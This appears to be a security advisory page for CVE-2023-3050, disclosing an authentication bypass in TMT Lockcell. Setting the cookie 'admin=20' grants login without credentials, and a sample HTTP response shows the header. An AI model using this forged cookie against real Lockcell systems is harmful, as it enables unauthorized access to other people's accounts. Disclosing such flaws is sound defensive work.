CVE-2023-3050 Reliance on Cookies without Validation and Integrity Checking in a Security Decision vulnerability in TMT Lockcell allows Privilege Abuse, Authentication Bypass

CVE-ID: CVE-2023-3050

Author: Efe Özel

Team: Ömer Yılmaz – Murat Öztürk

Parameter: Set-Cookie: admin=20

Details: If we set the admin’s cookie value to 20 as i have given in the example below, we can log in to the system without entering any credentials. We can also change the cookie value manually

HTTP RESPONSE

				
					HTTP/1.1 302 Found

Cache-Control: private

Content-Type: text/html; charset=utf-8

Location: /

Server: Microsoft-IIS/10.0

X-AspNetMvc-Version: 5.2

X-AspNet-Version: 4.0.30319

Set-Cookie: admin=20; expires=Mon, 19-Jun-2023 14:10:10 GMT; path=/

X-Powered-By: ASP.NET

Date: Mon, 19 Jun 2023 08:05:10 GMT

Connection: close

Content-Length: 118



<html><head><title>Object moved</title></head><body>

<h2>Object moved to <a href="/">here</a>.</h2>

</body></html>

İlgili Yazılar

Cisco IP Telefonlarında Kritik Güvenlik Açığı Keşfedildi

Cisco, IP telefon web sunucusunda kimliği doğrulanmamış bir saldırgan tarafından uzaktan kod yürütülmesine olanak sağlayan kritik bir güvenlik açığının önüne...